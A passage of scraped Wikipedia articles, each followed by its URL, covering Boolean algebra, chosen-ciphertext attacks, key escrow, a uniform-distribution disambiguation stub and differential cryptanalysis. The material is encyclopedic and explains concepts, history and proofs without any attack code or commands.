way through, whether it is an input or output port. Theduality principle, orDe Morgan's laws, can be understood as asserting that complementing all three ports of an AND gate converts it to an OR gate and vice versa, as shown in Figure 4 below. Complementing both ports of an inverter however leaves the operation unchanged. More generally, one may complement any of the eight subsets of the three ports of either an AND or OR gate. The resulting sixteen possibilities give rise to only eight Boolean operations, namely those with an odd number of 1s in their truth table. There are eight such because the "odd-bit-out" can be either 0 or 1 and can go in any of four positions in the truth table. There being sixteen binary Boolean operations, this must leave eight operations with an even number of 1s in their truth tables. Two of these are the constants 0 and 1 (as binary operations that ignore both their inputs); four are the operations that depend nontrivially on exactly one of their two inputs, namelyx,y, ¬x, and ¬y; and the remaining two arex⊕y(XOR) and its complementx≡y. The term "algebra" denotes both a subject, namely the subject ofalgebra, and an object, namely analgebraic structure. Whereas the foregoing has addressed the subject of Boolean algebra, this section deals with mathematical objects called Boolean algebras, defined in full generality as any model of the Boolean laws. We begin with a special case of the notion definable without reference to the laws, namely concrete Boolean algebras, and then givethe formal definitionof the general notion. Aconcrete Boolean algebraorfield of setsis any nonempty set of subsets of a given setXclosed under the set operations ofunion,intersection, andcomplementrelative toX.[5] (HistoricallyXitself was required to be nonempty as well to exclude the degenerate or one-element Boolean algebra, which is the one exception to the rule that all Boolean algebras satisfy the same equations since the degenerate algebra satisfies every equation. However, this exclusion conflicts with the preferred purely equational definition of "Boolean algebra", there being no way to rule out the one-element algebra using only equations— 0 ≠ 1 does not count, being a negated equation. Hence modern authors allow the degenerate Boolean algebra and letXbe empty.) Example 1.Thepower set2XofX, consisting of allsubsetsofX. HereXmay be any set: empty, finite, infinite, or evenuncountable. Example 2.The empty set andX. This two-element algebra shows that a concrete Boolean algebra can be finite even when it consists of subsets of an infinite set. It can be seen that every field of subsets ofXmust contain the empty set andX. Hence no smaller example is possible, other than the degenerate algebra obtained by takingXto be empty so as to make the empty set andXcoincide. Example 3.The set of finite andcofinitesets of integers, where a cofinite set is one omitting only finitely many integers. This is clearly closed under complement, and is closed under union because the union of a cofinite set with any set is cofinite, while the union of two finite sets is finite. Intersection behaves like union with "finite" and "cofinite" interchanged. This example is countably infinite because there are only countably many finite sets of integers. Example 4.For a less trivial example of the point made by example 2, consider aVenn diagramformed bynclosed curvespartitioningthe diagram into 2nregions, and letXbe the (infinite) set of all points in the plane not on any curve but somewhere within the diagram. The interior of each region is thus an infinite subset ofX, and every point inXis in exactly one region. Then the set of all 22npossible unions of regions (including the empty set obtained as the union of the empty set of regions andXobtained as the union of all 2nregions) is closed under union, intersection, and complement relative toXand therefore forms a concrete Boolean algebra. Again, there are finitely many subsets of an infinite set forming a concrete Boolean algebra, with example 2 arising as the casen= 0 of no curves. A subsetYofXcan be identified with anindexed familyof bits withindex setX, with the bit indexed byx∈Xbeing 1 or 0 according to whether or notx∈Y. (This is the so-calledcharacteristic functionnotion of a subset.) For example, a 32-bit computer word consists of 32 bits indexed by the set {0,1,2,...,31}, with 0 and 31 indexing the low and high order bits respectively. For a smaller example, if⁠X={a,b,c}{\displaystyle X=\{a,b,c\}}⁠wherea, b, care viewed as bit positions in that order from left to right, the eight subsets {}, {c}, {b}, {b,c}, {a}, {a,c}, {a,b}, and {a,b,c} ofXcan be identified with the respective bit vectors 000, 001, 010, 011, 100, 101, 110, and 111. Bit vectors indexed by the set of natural numbers are infinitesequencesof bits, while those indexed by therealsin theunit interval[0,1] are packed too densely to be able to write conventionally but nonetheless form well-defined indexed families (imagine coloring every point of the interval [0,1] either black or white independently; the black points then form an arbitrary subset of [0,1]). From this bit vector viewpoint, a concrete Boolean algebra can be defined equivalently as a nonempty set of bit vectors all of the same length (more generally, indexed by the same set) and closed under the bit vector operations ofbitwise∧, ∨, and ¬, as in1010∧0110 = 0010,1010∨0110 = 1110, and¬1010 = 0101, the bit vector realizations of intersection, union, and complement respectively. The set {0,1} and its Boolean operations as treated above can be understood as the special case of bit vectors of length one, which by the identification of bit vectors with subsets can also be understood as the two subsets of a one-element set. This is called theprototypicalBoolean algebra, justified by the following observation. This observation is proved as follows. Certainly any law satisfied by all concrete Boolean algebras is satisfied by the prototypical one since it is concrete. Conversely any law that fails for some concrete Boolean algebra must have failed at a particular bit position, in which case that position by itself furnishes a one-bit counterexample to that law. Nondegeneracy ensures the existence of at least one bit position because there is only one empty bit vector. The final goal of the next section can be understood as eliminating "concrete" from the above observation. That goal is reached via the stronger observation that, up to isomorphism, all Boolean algebras are concrete. The Boolean algebras so far have all been concrete, consisting of bit vectors or equivalently of subsets of some set. Such a Boolean algebra consists of a set and operations on that set which can beshownto satisfy the laws of Boolean algebra. Instead of showing that the Boolean laws are satisfied, we can instead postulate a setX, two binary operations onX, and one unary operation, andrequirethat those operations satisfy the laws of Boolean algebra. The elements ofXneed not be bit vectors or subsets but can be anything at all. This leads to the more generalabstractdefinition. For the purposes of this definition it is irrelevant how the operations came to satisfy the laws, whether by fiat or proof. All concrete Boolean algebras satisfy the laws (by proof rather than fiat), whence every concrete Boolean algebra is a Boolean algebra according to our definitions. This axiomatic definition of a Boolean algebra as a set and certain operations satisfying certain laws or axiomsby fiatis entirely analogous to the abstract definitions ofgroup,ring,fieldetc. characteristic of modern orabstract algebra. Given any complete axiomatization of Boolean algebra, such as the axioms for acomplementeddistributive lattice, a sufficient condition for analgebraic structureof this kind to satisfy all the Boolean laws is that it satisfy just those axioms. The following is therefore an equivalent definition. The section onaxiomatizationlists other axiomatizations, any of which can be made the basis of an equivalent definition. Although every concrete Boolean algebra is a Boolean algebra, not every Boolean algebra need be concrete. Letnbe asquare-freepositive integer, one not divisible by the square of an integer, for example 30 but not 12. The operations ofgreatest common divisor,least common multiple, and division inton(that is, ¬x=n/x), can be shown to satisfy all the Boolean laws when their arguments range over the positive divisors ofn. Hence those divisors form a Boolean algebra. These divisors are not subsets of a set, making the divisors ofna Boolean algebra that is not concrete according to our definitions. However, if each divisor ofnisrepresentedby the set of its prime factors, this nonconcrete Boolean algebra isisomorphicto the concrete Boolean algebra consisting of all sets of prime factors ofn, with union corresponding to least common multiple, intersection to greatest common divisor, and complement to division inton. So this example, while not technically concrete, is at least "morally" concrete via this representation, called anisomorphism. This example is an instance of the following notion. The next question is answered positively as follows. That is, up to isomorphism, abstract and concrete Boolean algebras are the same thing. This result depends on theBoolean prime ideal theorem, a choice principle slightly weaker than theaxiom of choice. This strong relationship implies a weaker result strengthening the observation in the previous subsection to the following easy consequence of representability. It is weaker in the sense that it does not of itself imply representability. Boolean algebras are special here, for example arelation algebrais a Boolean algebra with additional structure but it is not the case that every relation algebra is representable in the sense appropriate to relation algebras. The above definition of an abstract Boolean algebra as a set together with operations satisfying "the" Boolean laws raises the question of what those laws are. A simplistic answer is "all Boolean laws", which can be defined as all equations that hold for the Boolean algebra of 0 and 1. However, since there are infinitely many such laws, this is not a satisfactory answer in practice, leading to the question of it suffices to require only finitely many laws to hold. In the case of Boolean algebras, the answer is "yes": the finitely many equations listed above are sufficient. Thus, Boolean algebra is said to befinitely axiomatizableorfinitely based. Moreover, the number of equations needed can be further reduced. To begin with, some of the above laws are implied by some of the others. A sufficient subset of the above laws consists of the pairs of associativity, commutativity, and absorption laws, distributivity of ∧ over ∨ (or the other distributivity law—one suffices), and the two complement laws. In fact, this is the traditional axiomatization of Boolean algebra as acomplementeddistributive lattice. By introducing additional laws not listed above, it becomes possible to shorten the list of needed equations yet further; for instance, with the vertical bar representing theSheffer strokeoperation, the single axiom((a∣b)∣c)∣(a∣((a∣c)∣a))=c{\displaystyle ((a\mid b)\mid c)\mid (a\mid ((a\mid c)\mid a))=c}is sufficient to completely axiomatize Boolean algebra. It is also possible to find longer single axioms using more conventional operations; seeMinimal axioms for Boolean algebra.[32] Propositional logicis alogical systemthat is intimately connected to Boolean algebra.[5]Many syntactic concepts of Boolean algebra carry over to propositional logic with only minor changes in notation and terminology, while the semantics of propositional logic are defined via Boolean algebras in a way that the tautologies (theorems) of propositional logic correspond to equational theorems of Boolean algebra. Syntactically, every Boolean term corresponds to apropositional formulaof propositional logic. In this translation between Boolean algebra and propositional logic, Boolean variablesx, y,... becomepropositional variables(oratoms)P, Q, ... Boolean terms such asx∨ybecome propositional formulasP∨Q; 0 becomesfalseor⊥, and 1 becomestrueorT. It is convenient when referring to generic propositions to use Greek letters Φ, Ψ, ... as metavariables (variables outside the language of propositional calculus, used when talkingaboutpropositional calculus) to denote propositions. The semantics of propositional logic rely ontruth assignments. The essential idea of a truth assignment is that the propositional variables are mapped to elements of a fixed Boolean algebra, and then thetruth valueof a propositional formula using these letters is the element of the Boolean algebra that is obtained by computing the value of the Boolean term corresponding to the formula. In classical semantics, only the two-element Boolean algebra is used, while inBoolean-valued semanticsarbitrary Boolean algebras are considered. Atautologyis a propositional formula that is assigned truth value1by every truth assignment of its propositional variables to an arbitrary Boolean algebra (or, equivalently, every truth assignment to the two element Boolean algebra). These semantics permit a translation between tautologies of propositional logic and equational theorems of Boolean algebra. Every tautology Φ of propositional logic can be expressed as the Boolean equation Φ = 1, which will be a theorem of Boolean algebra. Conversely, every theorem Φ = Ψ of Boolean algebra corresponds to the tautologies (Φ ∨ ¬Ψ) ∧ (¬Φ ∨ Ψ) and (Φ ∧ Ψ) ∨ (¬Φ ∧ ¬Ψ). If → is in the language, these last tautologies can also be written as (Φ → Ψ) ∧ (Ψ → Φ), or as two separate theorems Φ → Ψ and Ψ → Φ; if ≡ is available, then the single tautology Φ ≡ Ψ can be used. One motivating application of propositional calculus is the analysis of propositions and deductive arguments in natural language.[33]Whereas the proposition "ifx= 3, thenx+ 1 = 4" depends on the meanings of such symbols as + and 1, the proposition "ifx= 3, thenx= 3" does not; it is true merely by virtue of its structure, and remains true whether "x= 3" is replaced by "x= 4" or "the moon is made of green cheese." The generic or abstract form of this tautology is "ifP, thenP," or in the language of Boolean algebra,P→P.[citation needed] ReplacingPbyx= 3 or any other proposition is calledinstantiationofPby that proposition. The result of instantiatingPin an abstract proposition is called aninstanceof the proposition. Thus,x= 3 →x= 3 is a tautology by virtue of being an instance of the abstract tautologyP→P. All occurrences of the instantiated variable must be instantiated with the same proposition, to avoid such nonsense asP→x= 3 orx= 3 →x= 4. Propositional calculus restricts attention to abstract propositions, those built up from propositional variables using Boolean operations. Instantiation is still possible within propositional calculus, but only by instantiating propositional variables by abstract propositions, such as instantiatingQbyQ→PinP→ (Q→P) to yield the instanceP→ ((Q→P) →P). (The availability of instantiation as part of the machinery of propositional calculus avoids the need for metavariables within the language of propositional calculus, since ordinary propositional variables can be considered within the language to denote arbitrary propositions. The metavariables themselves are outside the reach of instantiation, not being part of the language of propositional calculus but rather part of the same language for talking about it that this sentence is written in, where there is a need to be able to distinguish propositional variables and their instantiations as being distinct syntactic entities.) An axiomatization of propositional calculus is a set of tautologies calledaxiomsand one or more inference rules for producing new tautologies from old. Aproofin an axiom systemAis a finite nonempty sequence of propositions each of which is either an instance of an axiom ofAor follows by some rule ofAfrom propositions appearing earlier in the proof (thereby disallowing circular reasoning). The last proposition is thetheoremproved by the proof. Every nonempty initial segment of a proof is itself a proof, whence every proposition in a proof is itself a theorem. An axiomatization issoundwhen every theorem is a tautology, andcompletewhen every tautology is a theorem.[34] Propositional calculus is commonly organized as aHilbert system, whose operations are just those of Boolean algebra and whose theorems are Boolean tautologies, those Boolean terms equal to the Boolean constant 1. Another form issequent calculus, which has two sorts, propositions as in ordinary propositional calculus, and pairs of lists of propositions calledsequents, such asA∨B,A∧C, ... ⊢A,B→C, ....The two halves of a sequent are called the antecedent and the succedent respectively. The customary metavariable denoting an antecedent or part thereof is Γ, and for a succedent Δ; thus Γ,A⊢ Δ would denote a sequent whose succedent is a list Δ and whose antecedent is a list Γ with an additional propositionAappended after it. The antecedent is interpreted as the conjunction of its propositions, the succedent as the disjunction of its propositions, and the sequent itself as theentailmentof the succedent by the antecedent. Entailment differs from implication in that whereas the latter is a binaryoperationthat returns a value in a Boolean algebra, the former is a binaryrelationwhich either holds or does not hold. In this sense, entailment is anexternalform of implication, meaning external to the Boolean algebra, thinking of the reader of the sequent as also being external and interpreting and comparing antecedents and succedents in some Boolean algebra. The natural interpretation of ⊢ is as ≤ in the partial order of the Boolean algebra defined byx≤yjust whenx∨y=y. This ability to mix external implication ⊢ and internal implication → in the one logic is among the essential differences between sequent calculus and propositional calculus.[35] Boolean algebra as the calculus of two values is fundamental to computer circuits, computer programming, and mathematical logic, and is also used in other areas of mathematics such as set theory and statistics.[5] In the early 20th century, several electrical engineers[who?]intuitively recognized that Boolean algebra was analogous to the behavior of certain types of electrical circuits.Claude Shannonformally proved such behavior was logically equivalent to Boolean algebra in his 1937 master's thesis,A Symbolic Analysis of Relay and Switching Circuits. Today, all modern general-purposecomputersperform their functions using two-value Boolean logic; that is, their electrical circuits are a physical manifestation of two-value Boolean logic. They achieve this in various ways: asvoltages on wiresin high-speed circuits and capacitive storage devices, as orientations of amagnetic domainin ferromagnetic storage devices, as holes inpunched cardsorpaper tape, and so on. (Some early computers used decimal circuits or mechanisms instead of two-valued logic circuits.) Of course, it is possible to code more than two symbols in any given medium. For example, one might use respectively 0, 1, 2, and 3 volts to code a four-symbol alphabet on a wire, or holes of different sizes in a punched card. In practice, the tight constraints of high speed, small size, and low power combine to make noise a major factor. This makes it hard to distinguish between symbols when there are several possible symbols that could occur at a single site. Rather than attempting to distinguish between four voltages on one wire, digital designers have settled on two voltages per wire, high and low. Computers use two-value Boolean circuits for the above reasons. The most common computer architectures use ordered sequences of Boolean values, called bits, of 32 or 64 values, e.g. 01101000110101100101010101001011. When programming inmachine code,assembly language, and certain otherprogramming languages, programmers work with the low-level digital structure of thedata registers. These registers operate on voltages, where zero volts represents Boolean 0, and a reference voltage (often +5 V, +3.3 V, or +1.8 V) represents Boolean 1. Such languages support both numeric operations and logical operations. In this context, "numeric" means that the computer treats sequences of bits asbinary numbers(base two numbers) and executes arithmetic operations like add, subtract, multiply, or divide. "Logical" refers to the Boolean logical operations of disjunction, conjunction, and negation between two sequences of bits, in which each bit in one sequence is simply compared to its counterpart in the other sequence. Programmers therefore have the option of working in and applying the rules of either numeric algebra or Boolean algebra as needed. A core differentiating feature between these families of operations is the existence of thecarryoperation in the first but not the second. Other areas where two values is a good choice are the law and mathematics. In everyday relaxed conversation, nuanced or complex answers such as "maybe" or "only on the weekend" are acceptable. In more focused situations such as a court of law or theorem-based mathematics, however, it is deemed advantageous to frame questions so as to admit a simple yes-or-no answer—is the defendant guilty or not guilty, is the proposition true or false—and to disallow any other answer. However, limiting this might prove in practice for the respondent, the principle of the simple yes–no question has become a central feature of both judicial and mathematical logic, makingtwo-valued logicdeserving of organization and study in its own right. A central concept of set theory is membership. An organization may permit multiple degrees of membership, such as novice, associate, and full. With sets, however, an element is either in or out. The candidates for membership in a set work just like the wires in a digital computer: each candidate is either a member or a nonmember, just as each wire is either high or low. Algebra being a fundamental tool in any area amenable to mathematical treatment, these considerations combine to make the algebra of two values of fundamental importance to computer hardware, mathematical logic, and set theory. Two-valued logic can be extended tomulti-valued logic, notably by replacing the Boolean domain {0, 1} with the unit interval [0,1], in which case rather than only taking values 0 or 1, any value between and including 0 and 1 can be assumed. Algebraically, negation (NOT) is replaced with 1 −x, conjunction (AND) is replaced with multiplication (xy), and disjunction (OR) is defined viaDe Morgan's law. Interpreting these values as logicaltruth valuesyields a multi-valued logic, which forms the basis forfuzzy logicandprobabilistic logic. In these interpretations, a value is interpreted as the "degree" of truth – to what extent a proposition is true, or the probability that the proposition is true. The original application for Boolean operations wasmathematical logic, where it combines the truth values, true or false, of individual formulas. Natural languages such as English have words for several Boolean operations, in particular conjunction (and), disjunction (or), negation (not), and implication (implies).But notis synonymous withand not. When used to combine situational assertions such as "the block is on the table" and "cats drink milk", which naïvely are either true or false, the meanings of theselogical connectivesoften have the meaning of their logical counterparts. However, with descriptions of behavior such as "Jim walked through the door", one starts to notice differences such as failure of commutativity, for example, the conjunction of "Jim opened the door" with "Jim walked through the door" in that order is not equivalent to their conjunction in the other order, sinceandusually meansand thenin such cases. Questions can be similar: the order "Is the sky blue, and why is the sky blue?" makes more sense than the reverse order. Conjunctive commands about behavior are like behavioral assertions, as inget dressed and go to school. Disjunctive commands suchlove me or leave meorfish or cut baittend to be asymmetric via the implication that one alternative is less preferable. Conjoined nouns such astea and milkgenerally describe aggregation as with set union whiletea or milkis a choice. However, context can reverse these senses, as inyour choices are coffee and teawhich usually means the same asyour choices are coffee or tea(alternatives). Double negation, as in "I don't not like milk", rarely means literally "I do like milk" but rather conveys some sort of hedging, as though to imply that there is a third possibility. "Not not P" can be loosely interpreted as "surely P", and althoughPnecessarily implies "not notP," the converse is suspect in English, much as withintuitionistic logic. In view of the highly idiosyncratic usage of conjunctions in natural languages, Boolean algebra cannot be considered a reliable framework for interpreting them. Boolean operations are used indigital logicto combine the bits carried on individual wires, thereby interpreting them over {0,1}. When a vector ofnidentical binary gates are used to combine two bit vectors each ofnbits, the individual bit operations can be understood collectively as a single operation on values from aBoolean algebrawith 2nelements. Naive set theoryinterprets Boolean operations as acting on subsets of a given setX. As we saw earlier this behavior exactly parallels the coordinate-wise combinations of bit vectors, with the union of two sets corresponding to the disjunction of two bit vectors and so on. The 256-element free Boolean algebra on three generators is deployed incomputer displaysbased onraster graphics, which usebit blitto manipulate whole regions consisting ofpixels, relying on Boolean operations to specify how the source region should be combined with the destination, typically with the help of a third region called themask. Modernvideo cardsoffer all223= 256ternary operations for this purpose, with the choice of operation being a one-byte (8-bit) parameter. The constantsSRC = 0xaaor0b10101010,DST = 0xccor0b11001100, andMSK = 0xf0or0b11110000allow Boolean operations such as(SRC^DST)&MSK(meaning XOR the source and destination and then AND the result with the mask) to be written directly as a constant denoting a byte calculated at compile time,0x80in the(SRC^DST)&MSKexample,0x88if justSRC^DST, etc. At run time the video card interprets the byte as the raster operation indicated by the original expression in a uniform way that requires remarkably little hardware and which takes time completely independent of the complexity of the expression. Solid modelingsystems forcomputer aided designoffer a variety of methods for building objects from other objects, combination by Boolean operations being one of them. In this method the space in which objects exist is understood as a setSofvoxels(the three-dimensional analogue of pixels in two-dimensional graphics) and shapes are defined as subsets ofS, allowing objects to be combined as sets via union, intersection, etc. One obvious use is in building a complex shape from simple shapes simply as the union of the latter. Another use is in sculpting understood as removal of material: any grinding, milling, routing, or drilling operation that can be performed with physical machinery on physical materials can be simulated on the computer with the Boolean operationx∧ ¬yorx−y, which in set theory is set difference, remove the elements ofyfrom those ofx. Thus given two shapes one to be machined and the other the material to be removed, the result of machining the former to remove the latter is described simply as their set difference. Search engine queries also employ Boolean logic. For this application, each web page on the Internet may be considered to be an "element" of a "set." The following examples use a syntax supported byGoogle.[NB 1]
https://en.wikipedia.org/wiki/Boolean_algebra
Achosen-ciphertext attack(CCA) is anattack modelforcryptanalysiswhere the cryptanalyst can gather information by obtaining the decryptions of chosen ciphertexts. From these pieces of information the adversary can attempt to recover the secret key used for decryption. For formal definitions of security against chosen-ciphertext attacks, see for example:Michael Luby[1]andMihir Bellareet al.[2] A number of otherwise secure schemes can be defeated under chosen-ciphertext attack. For example, theEl Gamalcryptosystem issemantically secureunderchosen-plaintext attack, but this semantic security can be trivially defeated under a chosen-ciphertext attack. Early versions ofRSApadding used in theSSLprotocol were vulnerable to a sophisticatedadaptive chosen-ciphertext attackwhich revealed SSL session keys. Chosen-ciphertext attacks have implications for some self-synchronizingstream ciphersas well. Designers of tamper-resistant cryptographicsmart cardsmust be particularly cognizant of these attacks, as these devices may be completely under the control of an adversary, who can issue a large number of chosen-ciphertexts in an attempt to recover the hidden secret key. It was not clear at all whether public key cryptosystems could withstand the chosen ciphertext attack until the initial breakthrough work ofMoni NaorandMoti Yungin 1990, which suggested a mode of dual encryption withintegrityproof (now known as the "Naor-Yung" encryption paradigm).[3]This work made understanding of the notion of security against chosen ciphertext attack much clearer than before and open the research direction of constructing systems with various protections against variants of the attack. When a cryptosystem is vulnerable to chosen-ciphertext attack, implementers must be careful to avoid situations in which an adversary might be able to decrypt chosen-ciphertexts (i.e., avoid providing a decryption oracle). This can be more difficult than it appears, as even partially chosen ciphertexts can permit subtle attacks. Additionally, other issues exist and some cryptosystems (such asRSA) use the same mechanism to sign messages and to decrypt them. This permits attacks whenhashingis not used on the message to be signed. A better approach is to use a cryptosystem which isprovably secureunder chosen-ciphertext attack, including (among others)RSA-OAEPsecure under the random oracle heuristics,Cramer-Shoupwhich was the first public key practical system to be secure. For symmetric encryption schemes it is known thatauthenticated encryptionwhich is a primitive based onsymmetric encryptiongives security against chosen ciphertext attacks, as was first shown byJonathan KatzandMoti Yung.[4] Chosen-ciphertext attacks, like other attacks, may be adaptive or non-adaptive. In an adaptive chosen-ciphertext attack, the attacker can use the results from prior decryptions to inform their choices of which ciphertexts to have decrypted. In a non-adaptive attack, the attacker chooses the ciphertexts to have decrypted without seeing any of the resulting plaintexts. After seeing the plaintexts, the attacker can no longer obtain the decryption of additional ciphertexts. A specially noted variant of the chosen-ciphertext attack is the "lunchtime", "midnight", or "indifferent" attack, in which an attacker may make adaptive chosen-ciphertext queries but only up until a certain point, after which the attacker must demonstrate some improved ability to attack the system.[5]The term "lunchtime attack" refers to the idea that a user's computer, with the ability to decrypt, is available to an attacker while the user is out to lunch. This form of the attack was the first one commonly discussed: obviously, if the attacker has the ability to make adaptive chosen ciphertext queries, no encrypted message would be safe, at least until that ability is taken away. This attack is sometimes called the "non-adaptive chosen ciphertext attack";[6]here, "non-adaptive" refers to the fact that the attacker cannot adapt their queries in response to the challenge, which is given after the ability to make chosen ciphertext queries has expired. A (full) adaptive chosen-ciphertext attack is an attack in which ciphertexts may be chosen adaptively before and after a challenge ciphertext is given to the attacker, with only the stipulation that the challenge ciphertext may not itself be queried. This is a stronger attack notion than the lunchtime attack, and is commonly referred to as a CCA2 attack, as compared to a CCA1 (lunchtime) attack.[6]Few practical attacks are of this form. Rather, this model is important for its use in proofs of security against chosen-ciphertext attacks. A proof that attacks in this model are impossible implies that any realistic chosen-ciphertext attack cannot be performed. A practical adaptive chosen-ciphertext attack is the Bleichenbacher attack againstPKCS#1.[7] Numerous cryptosystems are proven secure against adaptive chosen-ciphertext attacks, some proving this security property based only on algebraic assumptions, some additionally requiring an idealized random oracle assumption. For example, theCramer-Shoup system[5]is secure based on number theoretic assumptions and no idealization, and after a number of subtle investigations it was also established that the practical schemeRSA-OAEPis secure under the RSA assumption in the idealized random oracle model.[8]
https://en.wikipedia.org/wiki/Chosen_ciphertext_attack
Key escrow(also known as a"fair" cryptosystem)[1]is an arrangement in which thekeysneeded to decryptencrypteddata are held inescrowso that, under certain circumstances, an authorizedthird partymay gain access to those keys. These third parties may include businesses, who may want access to employees' secure business-relatedcommunications, orgovernments, who may wish to be able to view the contents of encrypted communications (also known asexceptional access).[2] The technical problem is a largely structural one. Access to protectedinformationmust be providedonlyto the intended recipient and at least one third party. The third party should be permitted access only under carefully controlled conditions, for instance, acourt order. Thus far, no system design has been shown to meet this requirement fully on a technical basis alone. All proposed systems also require correct functioning of some social linkage, for instance the process of request for access, examination of request for 'legitimacy' (as by acourt), and granting of access by technical personnel charged with access control. All such linkages / controls have serious problems from a system design security perspective. Systems in which the key may not be changed easily are rendered especially vulnerable as the accidental release of the key will result in many devices becoming totally compromised, necessitating an immediate key change or replacement of the system. On a national level, key escrow is controversial in many countries for at least two reasons. One involves mistrust of the security of the structural escrow arrangement. Many countries have a long history of less than adequate protection of others' information by assorted organizations, public and private, even when the information is held only under an affirmative legal obligation to protect it from unauthorized access. Another is technical concerns for the additional vulnerabilities likely to be introduced by supporting key escrow operations.[2]Thus far, no key escrow system has been designed which meets both objections and nearly all have failed to meet even one. Key escrow is proactive, anticipating the need for access to keys; a retroactive alternative iskey disclosure law, where users are required to surrender keys upon demand by law enforcement, or else face legal penalties. Key disclosure law avoids some of the technical issues and risks of key escrow systems, but also introduces new risks like loss of keys and legal issues such as involuntaryself-incrimination. The ambiguous termkey recoveryis applied to both types of systems.
https://en.wikipedia.org/wiki/Key_recovery
Uniform distributionmay refer to:
https://en.wikipedia.org/wiki/Uniform_distribution
Differentialcryptanalysisis a general form ofcryptanalysisapplicable primarily toblock ciphers, but also to stream ciphers and cryptographic hash functions. In the broadest sense, it is the study of how differences in information input can affect the resultant difference at the output. In the case of ablock cipher, it refers to a set of techniques for tracing differences through the network of transformation, discovering where the cipher exhibitsnon-random behavior, and exploiting such properties to recover the secret key (cryptography key). The discovery of differential cryptanalysis is generally attributed toEli BihamandAdi Shamirin the late 1980s, who published a number of attacks against various block ciphers and hash functions, including a theoretical weakness in theData Encryption Standard(DES). It was noted by Biham and Shamir that DES was surprisingly resistant to differential cryptanalysis, but small modifications to the algorithm would make it much more susceptible.[1]: 8–9 In 1994, a member of the original IBM DES team,Don Coppersmith, published a paper stating that differential cryptanalysis was known to IBM as early as 1974, and that defending against differential cryptanalysis had been a design goal.[2]According to authorSteven Levy, IBM had discovered differential cryptanalysis on its own, and theNSAwas apparently well aware of the technique.[3]IBM kept some secrets, as Coppersmith explains: "After discussions with NSA, it was decided that disclosure of the design considerations would reveal the technique of differential cryptanalysis, a powerful technique that could be used against many ciphers. This in turn would weaken the competitive advantage the United States enjoyed over other countries in the field of cryptography."[2]Within IBM, differential cryptanalysis was known as the "T-attack"[2]or "Tickle attack".[4] While DES was designed with resistance to differential cryptanalysis in mind, other contemporary ciphers proved to be vulnerable. An early target for the attack was theFEALblock cipher. The original proposed version with four rounds (FEAL-4) can be broken using only eightchosen plaintexts, and even a 31-round version of FEAL is susceptible to the attack. In contrast, the scheme can successfully cryptanalyze DES with an effort on the order of 247chosen plaintexts. Differential cryptanalysis is usually achosen plaintext attack, meaning that the attacker must be able to obtainciphertextsfor some set ofplaintextsof their choosing. There are, however, extensions that would allow aknown plaintextor even aciphertext-only attack. The basic method uses pairs of plaintexts related by a constantdifference.Differencecan be defined in several ways, but theeXclusive OR (XOR)operation is usual. The attacker then computes the differences of the corresponding ciphertexts, hoping to detect statistical patterns in their distribution. The resulting pair of differences is called adifferential. Their statistical properties depend upon the nature of theS-boxesused for encryption, so the attacker analyses differentials(Δx,Δy){\displaystyle (\Delta _{x},\Delta _{y})}whereΔy=S(x⊕Δx)⊕S(x){\displaystyle \Delta _{y}=S(x\oplus \Delta _{x})\oplus S(x)}(and ⊕ denotes exclusive or) for each such S-boxS. In the basic attack, one particular ciphertext difference is expected to be especially frequent. In this way, theciphercan be distinguished fromrandom. More sophisticated variations allow the key to be recovered faster thanan exhaustive search. In the most basic form of key recovery through differential cryptanalysis, an attacker requests the ciphertexts for a large number of plaintext pairs, then assumes that the differential holds for at leastr− 1 rounds, whereris the total number of rounds.[citation needed]The attacker then deduces which round keys (for the final round) are possible, assuming the difference between the blocks before the final round is fixed. When round keys are short, this can be achieved by simply exhaustively decrypting the ciphertext pairs one round with each possible round key. When one round key has been deemed a potential round key considerably more often than any other key, it is assumed to be the correct round key. For any particular cipher, the input difference must be carefully selected for the attack to be successful. An analysis of the algorithm's internals is undertaken; the standard method is to trace a path of highly probable differences through the various stages of encryption, termed adifferential characteristic. Since differential cryptanalysis became public knowledge, it has become a basic concern of cipher designers. New designs are expected to be accompanied by evidence that the algorithm is resistant to this attack and many including theAdvanced Encryption Standard, have beenprovensecure against the attack.[5] The attack relies primarily on the fact that a given input/output difference pattern only occurs for certain values of inputs. Usually the attack is applied in essence to the non-linear components as if they were a solid component (usually they are in fact look-up tables orS-boxes). Observing the desired output difference (between two chosen or known plaintext inputs)suggestspossible key values. For example, if a differential of 1 => 1 (implying a difference in theleast significant bit(LSB) of the input leads to an output difference in the LSB) occurs with probability of 4/256 (possible with the non-linear function in theAES cipherfor instance) then for only 4 values (or 2 pairs) of inputs is that differential possible. Suppose we have a non-linear function where the key is XOR'ed before evaluation and the values that allow the differential are {2,3} and {4,5}. If the attacker sends in the values of {6, 7} and observes the correct output difference it means the key is either 6 ⊕ K = 2, or 6 ⊕ K = 4, meaning the key K is either 2 or 4. In essence, to protect a cipher from the attack, for an n-bit non-linear function one would ideally seek as close to 2−(n− 1)as possible to achievedifferential uniformity. When this happens, the differential attack requires as much work to determine the key as simply brute forcing the key.[6] The AES non-linear function has a maximum differential probability of 4/256 (most entries however are either 0 or 2). Meaning that in theory one could determine the key with half as much work as brute force, however, the high branch of AES prevents any high probability trails from existing over multiple rounds. In fact, the AES cipher would be just as immune to differential and linear attacks with a muchweakernon-linear function. The incredibly high branch (active S-box count) of 25 over 4R means that over 8 rounds, no attack involves fewer than 50 non-linear transforms, meaning that the probability of success does not exceed Pr[attack] ≤ Pr[best attack on S-box]50. For example, with the current S-box AES emits no fixed differential with a probability higher than (4/256)50or 2−300which is far lower than the required threshold of 2−128for a 128-bit block cipher. This would have allowed room for a more efficient S-box, even if it is 16-uniform the probability of attack would have still been 2−200. There exist no bijections for even sized inputs/outputs with 2-uniformity. They exist in odd fields (such as GF(27)) using either cubing or inversion (there are other exponents that can be used as well). For instance, S(x) = x3in any odd binary field is immune to differential and linear cryptanalysis. This is in part why theMISTYdesigns use 7- and 9-bit functions in the 16-bit non-linear function. What these functions gain in immunity to differential and linear attacks, they lose to algebraic attacks.[why?]That is, they are possible to describe and solve via aSAT solver. This is in part why AES (for instance) has anaffine mappingafter the inversion.
https://en.wikipedia.org/wiki/Differential_cryptanalysis
